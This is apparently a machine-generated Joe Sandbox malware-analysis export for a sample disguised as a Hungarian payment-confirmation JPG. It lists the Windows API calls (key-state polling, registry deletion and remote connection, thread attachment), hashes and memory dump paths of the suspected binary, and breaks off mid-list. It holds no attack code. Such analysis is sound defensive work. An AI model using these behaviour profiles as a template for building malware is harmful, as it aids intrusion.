                                                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 3076010158-4108050209
                                                                                                          • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                          • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                                          • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                          • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                                          • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$_memmove_wcslen
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 1589278365-1403004172
                                                                                                          • Opcode ID: 5e1087f5231825e2fb604e9bf8bfba74490696239ffb2df424a283dc5993ef7b
                                                                                                          • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                                          • Opcode Fuzzy Hash: 5e1087f5231825e2fb604e9bf8bfba74490696239ffb2df424a283dc5993ef7b
                                                                                                          • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Handle
                                                                                                          • String ID: nul
                                                                                                          • API String ID: 2519475695-2873401336
                                                                                                          • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                          • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                                          • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                          • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                                          APIs
                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Handle
                                                                                                          • String ID: nul
                                                                                                          • API String ID: 2519475695-2873401336
                                                                                                          • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                          • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                                          • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                          • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                                          APIs
                                                                                                          • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          • _wcsncpy.LIBCMT ref: 00401C41
                                                                                                          • _wcscpy.LIBCMT ref: 00401C5D
                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                                                          • String ID: Line:
                                                                                                          • API String ID: 1874344091-1585850449
                                                                                                          • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                          • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                                          • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                          • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: SysAnimate32
                                                                                                          • API String ID: 0-1011021900
                                                                                                          • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                          • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                                          • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                          • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                                          APIs
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                            • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                            • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                            • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                            • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                          • GetFocus.USER32 ref: 0046157B
                                                                                                            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                                          • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                                          • __swprintf.LIBCMT ref: 00461608
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                                          • String ID: %s%d
                                                                                                          • API String ID: 2645982514-1110647743
                                                                                                          • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                          • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                                          • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                          • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                          • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                                          • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                          • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                                          APIs
                                                                                                          • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3488606520-0
                                                                                                          • Opcode ID: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
                                                                                                          • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                                          • Opcode Fuzzy Hash: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
                                                                                                          • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConnectRegistry_memmove_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 15295421-0
                                                                                                          • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                          • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                                          • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                          • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                                          APIs
                                                                                                          • GetCursorPos.USER32(?), ref: 004563A6
                                                                                                          • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                          • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                          • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3539004672-0
                                                                                                          • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                          • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                                          • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                          • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                                          APIs
                                                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                                          • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 327565842-0
                                                                                                          • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                          • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                                          • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                          • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                                          APIs
                                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                                          • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                                                          • String ID:
                                                                                                          • API String ID: 2832842796-0
                                                                                                          • Opcode ID: 80413c63c247ca5a6c50c863bbc5616d4301eed01054a3e2b3b6367dcd347471
                                                                                                          • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                                          • Opcode Fuzzy Hash: 80413c63c247ca5a6c50c863bbc5616d4301eed01054a3e2b3b6367dcd347471
                                                                                                          • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                                          APIs
                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Enum$CloseDeleteOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2095303065-0
                                                                                                          • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                          • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                                                          • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                          • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                                          APIs
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
